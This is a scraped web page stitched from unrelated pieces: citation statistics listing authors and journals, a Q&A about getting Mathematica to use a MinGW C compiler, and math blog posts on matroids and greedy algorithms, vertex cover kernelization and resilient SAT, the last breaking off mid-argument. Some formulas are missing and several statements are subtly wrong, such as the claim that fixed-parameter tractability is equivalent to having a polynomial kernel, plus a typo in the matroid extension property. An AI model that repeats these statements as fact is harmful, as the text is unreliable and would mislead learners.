Héger, Tamás 3 Kazhdan, David A. 3 Koh, Doowon 3 Korchmáros, Gábor 3 Kratsch, Dieter 3 Labbate, Domenico 3 Lovett, Shachar 3 Milanič, Martin 3 Mixer, Mark 3 Mojarrad, Hossein Nassajian 3 Nixon, Anthony 3 Nowakowski, Richard J. 3 Roche-Newton, Oliver 3 Ross, Elissa 3 Slomka, Boaz A. 3 Solomon, Noam 3 Sopena, Éric 3 Stein, Maya Jakobine 3 Valculescu, Claudiu 2 Alzohairi, Mohammad 2 Andres, Stephan Dominique 2 Anholcer, Marcin 2 Artstein-Avidan, Shiri 2 Austin, Tim D. 2 Bang-Jensen, Jørgen 2 Bannai, Eiichi 2 Ben Salha, Cherifa 2 Bonamy, Marthe 2 Bonomo-Braberman, Flavia ...and 680 more Authors
all top 5
#### Cited in 162 Journals
42 Discrete Mathematics 24 European Journal of Combinatorics 23 Discrete Applied Mathematics 21 Theoretical Computer Science 21 The Electronic Journal of Combinatorics 19 Discrete & Computational Geometry 16 Graphs and Combinatorics 12 Geometric and Functional Analysis. GAFA 7 Journal of Geometry 6 Journal of Combinatorial Theory. Series A 6 Algorithmica 6 SIAM Journal on Discrete Mathematics 6 Designs, Codes and Cryptography 6 Linear Algebra and its Applications 6 Journal of Algebraic Combinatorics 6 Discrete Analysis 5 Israel Journal of Mathematics 5 Advances in Mathematics 5 Transactions of the American Mathematical Society 5 Combinatorica 5 Integers 5 Comptes Rendus. Mathématique. Académie des Sciences, Paris 5 Contributions to Discrete Mathematics 4 Journal of Combinatorial Theory. Series B 4 Journal of Graph Theory 4 Journal of Number Theory 4 Proceedings of the American Mathematical Society 4 The Ramanujan Journal 4 Journal of Combinatorial Optimization 4 Annals of Combinatorics 4 Ars Mathematica Contemporanea 3 Bulletin of the Australian Mathematical Society 3 International Journal of Solids and Structures 3 Journal d’Analyse Mathématique 3 Problems of Information Transmission 3 Geometriae Dedicata 3 Journal of Algebra 3 Mathematika 3 Bulletin of the Korean Mathematical Society 3 Proceedings of the Indian Academy of Sciences. Mathematical Sciences 3 The Australasian Journal of Combinatorics 3 Combinatorics, Probability and Computing 3 Finite Fields and their Applications 3 Discussiones Mathematicae. Graph Theory 3 Journal of Integer Sequences 3 Journal of the European Mathematical Society (JEMS) 3 Bulletin of the Malaysian Mathematical Sciences Society. Second Series 3 Mediterranean Journal of Mathematics 3 Optimization Letters 2 Information Processing Letters 2 Journal of Mathematical Analysis and Applications 2 Mathematical Notes 2 Rocky Mountain Journal of Mathematics 2 Beiträge zur Algebra und Geometrie 2 Acta Arithmetica 2 Applied Mathematics and Computation 2 Publications Mathématiques 2 International Journal of Game Theory 2 Inventiones Mathematicae 2 Mathematische Annalen 2 Advances in Applied Mathematics 2 Acta Mathematica Hungarica 2 Order 2 Journal of Symbolic Computation 2 Forum Mathematicum 2 Computational Geometry 2 Aequationes Mathematicae 2 Bulletin of the American Mathematical Society. New Series 2 Archive for Mathematical Logic 2 Mathematical Programming. Series A. Series B 2 Indagationes Mathematicae. New Series 2 Journal of Combinatorial Designs 2 Selecta Mathematica. New Series 2 Opuscula Mathematica 2 ELA. The Electronic Journal of Linear Algebra 2 Portugaliae Mathematica. Nova Série 2 Journal of Multiple-Valued Logic and Soft Computing 2 AKCE International Journal of Graphs and Combinatorics 2 Discrete Optimization 2 Chebyshevskiĭ Sbornik 2 Applicable Analysis and Discrete Mathematics 2 Discrete Mathematics, Algorithms and Applications 2 Acta Universitatis Sapientiae. Mathematica 2 International Journal of Combinatorics 2 Dynamic Games and Applications 2 Iranian Journal of Mathematical Sciences and Informatics 2 Mathematics 2 Korean Journal of Mathematics 1 Linear and Multilinear Algebra 1 Mathematical Proceedings of the Cambridge Philosophical Society 1 Periodica Mathematica Hungarica 1 Ukrainian Mathematical Journal 1 ACM Transactions on Mathematical Software 1 Algebra Universalis 1 Annals of the Institute of Statistical Mathematics 1 Demonstratio Mathematica 1 Duke Mathematical Journal 1 Journal of Computational and Applied Mathematics 1 Journal of Functional Analysis 1 Journal of Pure and Applied Algebra ...and 62 more Journals
all top 5
#### Cited in 43 Fields
311 Combinatorics (05-XX) 109 Number theory (11-XX) 81 Convex and discrete geometry (52-XX) 60 Geometry (51-XX) 60 Computer science (68-XX) 39 Group theory and generalizations (20-XX) 39 Game theory, economics, finance, and other social and behavioral sciences (91-XX) 19 Mathematical logic and foundations (03-XX) 18 Information and communication theory, circuits (94-XX) 16 Linear and multilinear algebra; matrix theory (15-XX) 14 Order, lattices, ordered algebraic structures (06-XX) 14 Operations research, mathematical programming (90-XX) 13 Probability theory and stochastic processes (60-XX) 11 Algebraic geometry (14-XX) 11 Special functions (33-XX) 9 Functional analysis (46-XX) 8 Commutative algebra (13-XX) 7 Manifolds and cell complexes (57-XX) 6 Field theory and polynomials (12-XX) 6 Dynamical systems and ergodic theory (37-XX) 6 Algebraic topology (55-XX) 5 Topological groups, Lie groups (22-XX) 5 Ordinary differential equations (34-XX) 5 General topology (54-XX) 4 Real functions (26-XX) 4 Functions of a complex variable (30-XX) 3 Measure and integration (28-XX) 3 Mechanics of particles and systems (70-XX) 3 Mechanics of deformable solids (74-XX) 2 Category theory; homological algebra (18-XX) 2 Potential theory (31-XX) 2 Abstract harmonic analysis (43-XX) 2 Integral transforms, operational calculus (44-XX) 2 Statistics (62-XX) 2 Biology and other natural sciences (92-XX) 1 Associative rings and algebras (16-XX) 1 Nonassociative rings and algebras (17-XX) 1 Several complex variables and analytic spaces (32-XX) 1 Approximations and expansions (41-XX) 1 Differential geometry (53-XX) 1 Numerical analysis (65-XX) 1 Statistical mechanics, structure of matter (82-XX) 1 Mathematics education (97-XX)
|
|
# C compiler options passed by Mathematica
What options can be used for compilation using Compile or CreateExecutable in Mathematica and where can one find details on the possible values for the settings?
I have a recent build of MinGW installed on a Win7 workstation which works when called from the command line, but it isn't detected by Mathematica. The following should let Mathematica know where to find the compiler:
Needs["CCompilerDriverGenericCCompiler"]
$CCompiler = {"Compiler" -> GenericCCompiler, "CompilerInstallation" -> "C:\\Program Files\\mingw-builds\\x64-4.8.1-posix-seh-rev5\\mingw64\\bin","CompilerName" -> "x86_64-w64-mingw32-gcc.exe","CompileOptions" -> "-O2"}; Why does the following test code (from the specific compilers help) fail to compile? I assume Mathematica is still not recognizing the C compiler, but it's not clear why. In[1]:= greeter = CreateExecutable[StringJoin[ "#include<stdio.h>\n", "int main(){\n", " printf(\"Hello MinGW-w64 world.\\n\");\n", "}\n"], "hiworld", "Compiler" -> GenericCCompiler, "CompilerInstallation" -> "C:\\Program Files\\mingw-builds\\x64-4.8.1-posix-seh-rev5\\mingw64\\bin", "CompilerName" -> "x86_64-w64-mingw32-gcc.exe"] Out[1]=$Failed
Setting the "Debug"->True for CreateExecutable gives us some additional output:
In[2]:= greeter = (*same as above, with "Debug"->True*)
Out[2]= $Failed The -L (libraries path) and -I (include path) options shown in the output are mentioned briefly in the gcc docs and in this answer by @Szabolcs. • Does $CCompiler = {"Compiler" -> CCompilerDriverMinGWCompilerMinGWCompiler, "CompilerInstallation" -> "C:\\Program Files\\mingw-builds\\x64-4.8.1-posix-seh-rev5\\mingw64\\bin", "CompilerName" -> Automatic}; help? – xzczd Oct 9 '14 at 7:15
• @xzczd Do you have MinGWCompiler defined on your system? When I try with that setting I get the CreateExecutable::badcomp error message, which states: Compiler specification "Compiler"->CCompilerDriverMinGWCompilerMinGWCompiler does not specify a compiler driver listed by CCompilers[Full]. – dionys Oct 9 '14 at 8:21
• I have TDM-GCC installed in my computer. What's the output if you run CCompilers[Full]? – xzczd Oct 9 '14 at 8:25
• @xzczd With a fresh kernel after calling Needs["CCompilerDriver"];Needs["CCompilerDriverGenericCCompiler];, CCompilers[Full] returns {{Name->Intel Compiler,Compiler->CCompilerDriverIntelCompilerIntelCompiler,CompilerInstallation->None,CompilerName->Automatic},{Name->Generic C Compiler,Compiler->GenericCCompiler,CompilerInstallation->None,CompilerName->Automatic}}` – dionys Oct 9 '14 at 8:44
|
|
# When Greedy Algorithms are Perfect: the Matroid
Greedy algorithms are by far one of the easiest and most well-understood algorithmic techniques. There is a wealth of variations, but at its core the greedy algorithm optimizes something using the natural rule, “pick what looks best” at any step. So a greedy routing algorithm would say to a routing problem: “You want to visit all these locations with minimum travel time? Let’s start by going to the closest one. And from there to the next closest one. And so on.”
Because greedy algorithms are so simple, researchers have naturally made a big effort to understand their performance. Under what conditions will they actually solve the problem we’re trying to solve, or at least get close? In a previous post we gave some easy-to-state conditions under which greedy gives a good approximation, but the obvious question remains: can we characterize when greedy algorithms give an optimal solution to a problem?
The answer is yes, and the framework that enables us to do this is called a matroid. That is, if we can phrase the problem we’re trying to solve as a matroid, then the greedy algorithm is guaranteed to be optimal. Let’s start with an example when greedy is provably optimal: the minimum spanning tree problem. Throughout the article we’ll assume the reader is familiar with the very basics of linear algebra and graph theory (though we’ll remind ourselves what a minimum spanning tree is shortly). For a refresher, this blog has primers on both subjects. But first, some history.
## History
Matroids were first introduced by Hassler Whitney in 1935, and independently discovered a little later by B.L. van der Waerden (a big name in combinatorics). They were both interested in devising a general description of “independence,” the properties of which are strikingly similar when specified in linear algebra and graph theory. Since then the study of matroids has blossomed into a large and beautiful theory, one part of which is the characterization of the greedy algorithm: greedy is optimal on a problem if and only if the problem can be represented as a matroid. Mathematicians have also characterized which matroids can be modeled as spanning trees of graphs (we will see this momentarily). As such, matroids have become a standard topic in the theory and practice of algorithms.
## Minimum Spanning Trees
It is often natural in an undirected graph $G = (V,E)$ to find a connected subset of edges that touch every vertex. As an example, if you’re working on a power network you might want to identify a “backbone” of the network so that you can use the backbone to cheaply travel from any node to any other node. Similarly, in a routing network (like the internet) it costs a lot of money to lay down cable, it’s in the interest of the internet service providers to design analogous backbones into their infrastructure.
A minimal subset of edges in a backbone like this is guaranteed to form a tree. This is simply because if you have a cycle in your subgraph then removing any edge on that cycle doesn’t break connectivity or the fact that you can get from any vertex to any other (and trees are the maximal subgraphs without cycles). As such, these “backbones” are called spanning trees. “Span” here means that you can get from any vertex to any other vertex, and it suggests the connection to linear algebra that we’ll describe later, and it’s a simple property of a tree that there is a unique path between any two vertices in the tree.
An example of a spanning tree
When your edges $e \in E$ have nonnegative weights $w_e \in \mathbb{R}^{\geq 0}$, we can further ask to find a minimum cost spanning tree. The cost of a spanning tree $T$ is just the sum of its edges, and it’s important enough of a definition to offset.
Definition: A minimum spanning tree $T$ of a weighted graph $G$ (with weights $w_e \geq 0$ for $e \in E$) is a spanning tree which minimizes the quantity
$w(T) = \sum_{e \in T} w_e$
There are a lot of algorithms to find minimal spanning trees, but one that will lead us to matroids is Kruskal’s algorithm. It’s quite simple. We’ll maintain a forest $F$ in $G$, which is just a subgraph consisting of a bunch of trees that may or may not be connected. At the beginning $F$ is just all the vertices with no edges. And then at each step we add to $F$ the edge $e$ whose weight is smallest and also does not introduce any cycles into $F$. If the input graph $G$ is connected then this will always produce a minimal spanning tree.
Theorem: Kruskal’s algorithm produces a minimal spanning tree of a connected graph.
Proof. Call $F_t$ the forest produced at step $t$ of the algorithm. Then $F_0$ is the set of all vertices of $G$ and $F_{n-1}$ is the final forest output by Kruskal’s (as a quick exercise, prove all spanning trees on $n$ vertices have $n-1$ edges, so we will stop after $n-1$ rounds). It’s clear that $F_{n-1}$ is a tree because the algorithm guarantees no $F_i$ will have a cycle. And any tree with $n-1$ edges is necessarily a spanning tree, because if some vertex were left out then there would be $n-1$ edges on a subgraph of $n-1$ vertices, necessarily causing a cycle somewhere in that subgraph.
Now we’ll prove that $F_{n-1}$ has minimal cost. We’ll prove this in a similar manner to the general proof for matroids. Indeed, say you had a tree $T$ whose cost is strictly less than that of $F_{n-1}$ (we can also suppose that $T$ is minimal, but this is not necessary). Pick the minimal weight edge $e \in T$ that is not in $F_{n-1}$. Adding $e$ to $F_{n-1}$ introduces a unique cycle $C$ in $F_{n-1}$. This cycle has some strange properties. First, $e$ has the highest cost of any edge on $C$. For otherwise, Kruskal’s algorithm would have chosen it before the heavier weight edges. Second, there is another edge in $C$ that’s not in $T$ (because $T$ was a tree it can’t have the entire cycle). Call such an edge $e'$. Now we can remove $e'$ from $F_{n-1}$ and add $e$. This can only increase the total cost of $F_{n-1}$, but this transformation produces a tree with one more edge in common with $T$ than before. This contradicts that $T$ had strictly lower weight than $F_{n-1}$, because repeating the process we described would eventually transform $F_{n-1}$ into $T$ exactly, while only increasing the total cost.
$\square$
Just to recap, we defined sets of edges to be “good” if they did not contain a cycle, and a spanning tree is a maximal set of edges with this property. In this scenario, the greedy algorithm performed optimally at finding a spanning tree with minimal total cost.
## Columns of Matrices
Now let’s consider a different kind of problem. Say I give you a matrix like this one:
$\displaystyle A = \begin{pmatrix} 2 & 0 & 1 & -1 & 0 \\ 0 & -4 & 0 & 1 & 0 \\ 0 & 0 & 1 & 0 & 7 \end{pmatrix}$
In the standard interpretation of linear algebra, this matrix represents a linear function $f$ from one vector space $V$ to another $W$, with the basis $(v_1, \dots, v_5)$ of $V$ being represented by columns and the basis $(w_1, w_2, w_3)$ of $W$ being represented by the rows. Column $j$ tells you how to write $f(v_j)$ as a linear combination of the $w_i$, and in so doing uniquely defines $f$.
Now one thing we want to calculate is the rank of this matrix. That is, what is the dimension of the image of $V$ under $f$? By linear algebraic arguments we know that this is equivalent to asking “how many linearly independent columns of $A$ can we find”? An interesting consequence is that if you have two sets of columns that are both linearly independent and maximally so (adding any other column to either set would necessarily introduce a dependence in that set), then these two sets have the same size. This is part of why the rank of a matrix is well-defined.
If we were to give the columns of $A$ costs, then we could ask about finding the minimal-cost maximally-independent column set. It sounds like a mouthful, but it’s exactly the same idea as with spanning trees: we want a set of vectors that spans the whole column space of $A$, but contains no “cycles” (linearly dependent combinations), and we want the cheapest such set.
So we have two kinds of “independence systems” that seem to be related. One interesting question we can ask is whether these kinds of independence systems are “the same” in a reasonable way. Hardcore readers of this blog may see the connection quite quickly. For any graph $G = (V,E)$, there is a natural linear map from $E$ to $V$, so that a linear dependence among the columns (edges) corresponds to a cycle in $G$. This map is called the incidence matrix by combinatorialists and the first boundary map by topologists.
The map is easy to construct: for each edge $e = (v_i,v_j)$ you add a column with a 1 in the $j$-th row and a $-1$ in the $i$-th row. Then taking a sum of edges gives you zero if and only if the edges form a cycle. So we can think of a set of edges as “independent” if they don’t contain a cycle. It’s a little bit less general than independence over $\mathbb{R}$, but you can make it exactly the same kind of independence if you change your field from real numbers to $\mathbb{Z}/2\mathbb{Z}$. We won’t do this because it will detract from our end goal (to analyze greedy algorithms in realistic settings), but for further reading this survey of Oxley assumes that perspective.
So with the recognition of how similar these notions of independence are, we are ready to define matroids.
## The Matroid
So far we’ve seen two kinds of independence: “sets of edges with no cycles” (also called forests) and “sets of linearly independent vectors.” Both of these share two trivial properties: there are always nonempty independent sets, and every subset of an independent set is independent. We will call any family of subsets with this property an independence system.
Definition: Let $X$ be a finite set. An independence system over $X$ is a family $\mathscr{I}$ of subsets of $X$ with the following two properties.
1. $\mathscr{I}$ is nonempty.
2. If $I \in \mathscr{I}$, then so is every subset of $I$.
This is too general to characterize greedy algorithms, so we need one more property shared by our examples. There are a few things we do, but here’s one nice property that turns out to be enough.
Definition: A matroid $M = (X, \mathscr{I})$ is a set $X$ and an independence system $\mathscr{I}$ over $X$ with the following property:
If $A, B$ are in $\mathscr{I}$ with $|A| = |B| + 1$, then there is an element $x \in A \setminus B$ such that $B \cup \{ a \} \in \mathscr{I}$.
In other words, this property says if I have an independent set that is not maximally independent, I can grow the set by adding some suitably-chosen element from a larger independent set. We’ll call this the extension property. For a warmup exercise, let’s prove that the extension property is equivalent to the following (assuming the other properties of a matroid):
For every subset $Y \subset X$, all maximal independent sets contained in $Y$ have equal size.
Proof. For one direction, if you have two maximal sets $A, B \subset Y \subset X$ that are not the same size (say $A$ is bigger), then you can take any subset of $A$ whose size is exactly $|B| + 1$, and use the extension property to make $B$ larger, a contradiction. For the other direction, say that I know all maximal independent sets of any $Y \subset X$ have the same size, and you give me $A, B \subset X$. I need to find an $a \in A \setminus B$ that I can add to $B$ and keep it independent. What I do is take the subset $Y = A \cup B$. Now the sizes of $A, B$ don’t change, but $B$ can’t be maximal inside $Y$ because it’s smaller than $A$ ($A$ might not be maximal either, but it’s still independent). And the only way to extend $B$ is by adding something from $A$, as desired.
$\square$
So we can use the extension property and the cardinality property interchangeably when talking about matroids. Continuing to connect matroid language to linear algebra and graph theory, the maximal independent sets of a matroid are called bases, the size of any basis is the rank of the matroid, and the minimal dependent sets are called circuits. In fact, you can characterize matroids in terms of the properties of their circuits, which are dual to the properties of bases (and hence all independent sets) in a very concrete sense.
But while you could spend all day characterizing the many kinds of matroids and comatroids out there, we are still faced with the task of seeing how the greedy algorithm performs on a matroid. That is, suppose that your matroid $M = (X, \mathscr{I})$ has a nonnegative real number $w(x)$ associated with each $x \in X$. And suppose we had a black-box function to determine if a given set $S \subset X$ is independent. Then the greedy algorithm maintains a set $B$, and at every step adds a minimum weight element that maintains the independence of $B$. If we measure the cost of a subset by the sum of the weights of its elements, then the question is whether the greedy algorithm finds a minimum weight basis of the matroid.
The answer is even better than yes. In fact, the answer is that the greedy algorithm performs perfectly if and only if the problem is a matroid! More rigorously,
Theorem: Suppose that $M = (X, \mathscr{I})$ is an independence system, and that we have a black-box algorithm to determine whether a given set is independent. Define the greedy algorithm to iteratively adds the cheapest element of $X$ that maintains independence. Then the greedy algorithm produces a maximally independent set $S$ of minimal cost for every nonnegative cost function on $X$, if and only if $M$ is a matroid.
It’s clear that the algorithm will produce a set that is maximally independent. The only question is whether what it produces has minimum weight among all maximally independent sets. We’ll break the theorem into the two directions of the “if and only if”:
Part 1: If $M$ is a matroid, then greedy works perfectly no matter the cost function.
Part 2: If greedy works perfectly for every cost function, then $M$ is a matroid.
Proof of Part 1.
Call the cost function $w : X \to \mathbb{R}^{\geq 0}$, and suppose that the greedy algorithm picks elements $B = \{ x_1, x_2, \dots, x_r \}$ (in that order). It’s easy to see that $w(x_1) \leq w(x_2) \leq \dots \leq w(x_r)$. Now if you give me any list of $r$ independent elements $y_1, y_2, \dots, y_r \in X$ that has $w(y_1) \leq \dots \leq w(y_r)$, I claim that $w(x_i) \leq w(y_i)$ for all $i$. This proves what we want, because if there were a basis of size $r$ with smaller weight, sorting its elements by weight would give a list contradicting this claim.
To prove the claim, suppose to the contrary that it were false, and for some $k$ we have $w(x_k) > w(y_k)$. Moreover, pick the smallest $k$ for which this is true. Note $k > 1$, and so we can look at the special sets $S = \{ x_1, \dots, x_{k-1} \}$ and $T = \{ y_1, \dots, y_k \}$. Now $|T| = |S|+1$, so by the matroid property there is some $j$ between $1$ and $r$ so that $S \cup \{ y_j \}$ is an independent set (and $y_j$ is not in $S$). But then $w(y_j) \leq w(y_k) < w(x_k)$, and so the greedy algorithm would have picked $y_j$ before it picks $x_k$ (and the strict inequality means they’re different elements). This contradicts how the greedy algorithm runs, and hence proves the claim.
Proof of Part 2.
We’ll prove this contrapositively as follows. Suppose we have our independence system and it doesn’t satisfy the last matroid condition. Then we’ll construct a special weight function that causes the greedy algorithm to fail. So let $A,B$ be independent sets with $|A| = |B| + 1$, but for every $a \in A \setminus B$ adding $a$ to $B$ never gives you an independent set.
Now what we’ll do is define our weight function so that the greedy algorithm picks the elements we want in the order we want (roughly). In particular, we’ll assign all elements of $A \cap B$ a tiny weight we’ll call $w_1$. For elements of $B - A$ we’ll use $w_2$, and for $A - B$ we’ll use $w_3$, with $w_4$ for everything else. In a more compact notation:
We need two things for this weight function to screw up the greedy algorithm. The first is that $w_1 < w_2 < w_3 < w_4$, so that greedy picks the elements in the order we want. Note that this means it’ll first pick all of $A \cap B$, and then all of $B - A$, and by assumption it won’t be able to pick anything from $A - B$, but since $B$ is assumed to be non-maximal, we have to pick at least one element from $X - (A \cup B)$ and pay $w_4$ for it.
So the second thing we want is that the cost of doing greedy is worse than picking any maximally independent set that contains $A$ (and we know that there has to be some maximal independent set containing $A$). In other words, if we call $m$ the size of a maximally independent set, we want
$\displaystyle |A \cap B| w_1 + |B-A|w_2 + (m - |B|)w_4 > |A \cap B|w_1 + |A-B|w_3 + (m-|A|)w_4$
This can be rearranged (using the fact that $|A| = |B|+1$) to
$\displaystyle w_4 > |A-B|w_3 - |B-A|w_2$
The point here is that the greedy picks too many elements of weight $w_4$, since if we were to start by taking all of $A$ (instead of all of $B$), then we could get by with one fewer. That might not be optimal, but it’s better than greedy and that’s enough for the proof.
So we just need to make $w_4$ large enough to make this inequality hold, while still maintaining $w_2 < w_3$. There are probably many ways to do this, and here’s one. Pick some $0 < \varepsilon < 1$, and set
It’s trivial that $w_1 < w_2$ and $w_3 < w_4$. For the rest we need some observations. First, the fact that $|A-B| = |B-A| + 1$ implies that $w_2 < w_3$. Second, both $|A-B|$ and $|B-A|$ are nonempty, since otherwise the second property of independence systems would contradict our assumption that augmenting $B$ with elements of $A$ breaks independence. Using this, we can divide by these quantities to get
$\displaystyle w_4 = 2 > 1 = \frac{|A-B|(1 + \varepsilon)}{|A-B|} - \frac{|B-A|\varepsilon}{|B-A|}$
This proves the claim and finishes the proof.
$\square$
As a side note, we proved everything here with respect to minimizing the sum of the weights, but one can prove an identical theorem for maximization. The only part that’s really different is picking the clever weight function in part 2. In fact, you can convert between the two by defining a new weight function that subtracts the old weights from some fixed number $N$ that is larger than any of the original weights. So these two problems really are the same thing.
This is pretty amazing! So if you can prove your problem is a matroid then you have an awesome algorithm automatically. And if you run the greedy algorithm for fun and it seems like it works all the time, then that may be hinting that your problem is a matroid. This is one of the best situations one could possibly hope for.
But as usual, there are a few caveats to consider. They are both related to efficiency. The first is the black box algorithm for determining if a set is independent. In a problem like minimum spanning tree or finding independent columns of a matrix, there are polynomial time algorithms for determining independence. These two can both be done, for example, with Gaussian elimination. But there’s nothing to stop our favorite matroid from requiring an exponential amount of time to check if a set is independent. This makes greedy all but useless, since we need to check for independence many times in every round.
Another, perhaps subtler, issue is that the size of the ground set $X$ might be exponentially larger than the rank of the matroid. In other words, at every step our greedy algorithm needs to find a new element to add to the set it’s building up. But there could be such a huge ocean of candidates, all but a few of which break independence. In practice an algorithm might be working with $X$ implicitly, so we could still hope to solve the problem if we had enough knowledge to speed up the search for a new element.
There are still other concerns. For example, a naive approach to implementing greedy takes quadratic time, since you may have to look through every element of $X$ to find the minimum-cost guy to add. What if you just have to have faster runtime than $O(n^2)$? You can still be interested in finding more efficient algorithms that still perform perfectly, and to the best of my knowledge there’s nothing that says that greedy is the only exact algorithm for your favorite matroid. And then there are models where you don’t have direct/random access to the input, and lots of other ways that you can improve on greedy. But those stories are for another time.
Until then!
# Parameterizing the Vertex Cover Problem
I’m presenting a paper later this week at the Matheamtical Foundations of Computer Science 2014 in Budapest, Hungary. This conference is an interesting mix of logic and algorithms that aims to bring together researchers from these areas to discuss their work. And right away the first session on the first day focused on an area I know is important but have little experience with: fixed parameter complexity. From what I understand it’s not that popular of a topic at major theory conferences in the US (there appears to be only one paper on it at this year’s FOCS conference), but the basic ideas are worth knowing.
The basic idea is pretty simple: some hard computational problems become easier (read, polynomial-time solvable) if you fix some parameters involved to constants. Preferably small constants. For example, finding cliques of size $k$ in a graph is NP-hard if $k$ is a parameter, but if you fix $k$ to a constant then you can check all possible subsets of size $k$ in $O(n^k)$ time. This is kind of a silly example because there are much faster ways to find triangles than checking all $O(n^3)$ subsets of vertices, but part of the point of fixed-parameter complexity is to find the fastest algorithms in these fixed-parameter settings. Since in practice parameters are often small [citation needed], this analysis can provide useful practical algorithmic alternatives to heuristics or approximate solutions.
One important tool in the theory of fixed-parameter tractability is the idea of a kernel. I think it’s an unfortunate term because it’s massively overloaded in mathematics, but the idea is to take a problem instance with the parameter $k$, and carve out “easy” regions of the instance (often reducing $k$ as you go) until the runtime of the trivial brute force algorithm only depends on $k$ and not on the size of the input. The point is that the solution you get on this “carved out” instance is either the same as the original, or can be extended back to the original with little extra work. There is a more formal definition we’ll state, but there is a canonical example that gives a great illustration.
Consider the vertex cover problem. That is, you give me a graph $G = (V,E)$ and a number $k$ and I have to determine if there is a subset of $\leq k$ vertices of $G$ that touch all of the edges in $E$. This problem is fixed-parameter tractable because, as with $k$-clique one can just check all subsets of size $k$. The kernel approach we’ll show now is much smarter.
What you do is the following. As long as your graph has a vertex of degree $> k$, you remove it and reduce $k$ by 1. This is because a vertex of degree $> k$ will always be chosen for a vertex cover. If it’s not, then you need to include all of its neighbors to cover its edges, but there are $> k$ neighbors and your vertex cover is constrained by size $k$. And so you can automatically put this high-degree vertex in your cover, and use induction on the smaller graph.
Once you can’t remove any more vertices there are two cases. In the case that there are more than $k^2$ edges, you output that there is no vertex cover. Indeed, if you only get $k$ vertices in your cover and you removed all vertices of degree $> k$, then each can cover at most $k$ edges, giving a total of at most $k^2$. Otherwise, if there are at most $k^2$ edges, then you can remove all the isolated vertices and show that there are only $\leq 2k^2$ vertices left. This is because each edge touches only two vertices, so in the worst case they’re all distinct. This smaller subgraph is called a kernel of the vertex cover, and the fact that its size depends only on $k$ is the key. So you can look at all $2^{2k^2} = O(1)$ subsets to determine if there’s a cover of the size you want. If you find a cover of the kernel, you add back in all the large-degree vertices you deleted and you’re done.
Now, even for small $k$ this is a pretty bad algorithm ($k=5$ gives $2^{50}$ subsets to inspect), but with more detailed analysis you can do significantly better. In particular, the best known bound reduces vertex cover to a kernel of size $2k - c \log(k)$ vertices for any constant $c$ you specify. Getting $\log(k)$ vertices is known to imply P = NP, and with more detailed complexity assumptions it’s even hard to get a graph with fewer than $O(k^{2-\varepsilon})$ edges for any $\varepsilon > 0$. These are all relatively recent results whose associated papers I have not read.
Even with these hardness results, there are two reasons why this kind of analysis is useful. The first is that it gives us a clearer picture of the complexity of these problems. In particular, the reduction we showed for vertex cover gives a time $O(2^{2k^2} + n + m)$-time algorithm, which you can then compare directly to the trivial $O(n^k)$ time brute force algorithm and measure the difference. Indeed, if $k = o(\sqrt{(k/2) log(n)})$ then the kernelized approach is faster.
The second reason is that the kernel approach usually results in simple and quick checks for negative answers to a problem. In particular, if you want to check for $k$-sized set covers in a graph in the real world, this analysis shows that the first thing you should do is check if the kernel has size $> k^2$. If so, you can immediately give a “no” answer. So useful kernels can provide insight into the structure of a problem that can be turned into heuristic tools even when it doesn’t help you solve the problem exactly.
So now let’s just see the prevailing definition of a “kernelization” of a problem. This comes from the text of Downey and Fellows.
Definition: kernelization of a parameterized problem $L$ (formally, a language where each string $x$ is paired with a positive integer $k$) is a $\textup{poly}(|x|, k)$-time algorithm that converts instances $(x,k)$ into instances $(x', k')$ with the following three properties.
• $(x,k)$ is a yes instance of $L$ if and only if $(x', k')$ is.
• $|x'| \leq f(k)$ for some computable function $f: \mathbb{N} \to \mathbb{N}$.
• $k' \leq g(k)$ for some computable function $g: \mathbb{N} \to \mathbb{N}$.
The output $(x', k')$ is called a kernel, and the problem is said to admit a polynomial kernel if $f(k) = O(k^c)$ for some constant $c$.
So we showed that vertex cover admits a polynomial kernel (in fact, a quadratic one).
Now the nice theorem is that a problem is fixed-parameter tractable if and only if it admits a polynomial kernel. Finding a kernel is conceptually easier because, like in vertex cover, it allows you to introduce additional assumptions on the structure of the instances you’re working with. But more importantly from a theoretical standpoint, measuring the size and complexity of kernels for NP-hard problems gives us a way to discriminate among problems within NP. That and the chance to get some more practical tools for NP-hard problems makes parameterized complexity more interesting than it sounds at first.
Until next time!
# An Update on “Coloring Resilient Graphs”
A while back I announced a preprint of a paper on coloring graphs with certain resilience properties. I’m pleased to announce that it’s been accepted to the Mathematical Foundations of Computer Science 2014, which is being held in Budapest this year. Since we first published the preprint we’ve actually proved some additional results about resilience, and so I’ll expand some of the details here. I think it makes for a nicer overall picture, and in my opinion it gives a little more justification that resilient coloring is interesting, at least in contrast to other resilience problems.
## Resilient SAT
Recall that a “resilient” yes-instance of a combinatorial problem is one which remains a yes-instance when you add or remove some constraints. The way we formalized this for SAT was by fixing variables to arbitrary values. Then the question is how resilient does an instance need to be in order to actually find a certificate for it? In more detail,
Definition: $r$-resilient $k$-SAT formulas are satisfiable formulas in $k$-CNF form (conjunctions of clauses, where each clause is a disjunction of three literals) such that for all choices of $r$ variables, every way to fix those variables yields a satisfiable formula.
For example, the following 3-CNF formula is 1-resilient:
$\displaystyle (a \vee b \vee c) \wedge (a \vee \overline{b} \vee \overline{c}) \wedge (\overline{a} \vee \overline{b} \vee c)$
The idea is that resilience may impose enough structure on a SAT formula that it becomes easy to tell if it’s satisfiable at all. Unfortunately for SAT (though this is definitely not the case for coloring), there are only two possibilities. Either the instances are so resilient that they never existed in the first place (they’re vacuously trivial), or the instances are NP-hard. The first case is easy: there are no $k$-resilient $k$-SAT formulas. Indeed, if you’re allowed to fix $k$ variables to arbitrary values, then you can just pick a clause and set all its variables to false. So no formula can ever remain satisfiable under that condition.
The second case is when the resilience is strictly less than the clause size, i.e. $r$-resilient $k$-SAT for $0 \leq r < k$. In this case the problem of finding a satisfying assignment is NP-hard. We’ll show this via a sequence of reductions which start at 3-SAT, and they’ll involve two steps: increasing the clause size and resilience, and decreasing the clause size and resilience. The trick is in balancing which parts are increased and decreased. I call the first step the “blowing up” lemma, and the second part the “shrinking down” lemma.
## Blowing Up and Shrinking Down
Here’s the intuition behind the blowing up lemma. If you give me a regular (unresilient) 3-SAT formula $\varphi$, what I can do is make a copy of $\varphi$ with a new set of variables and OR the two things together. Call this $\varphi^1 \vee \varphi^2$. This is clearly logically equivalent to the original formula; if you give me a satisfying assignment for the ORed thing, I can just see which of the two clauses are satisfied and use that sub-assignment for $\varphi$, and conversely if you can satisfy $\varphi$ it doesn’t matter what truth values you choose for the new set of variables. And further you can transform the ORed formula into a 6-SAT formula in polynomial time. Just apply deMorgan’s rules for distributing OR across AND.
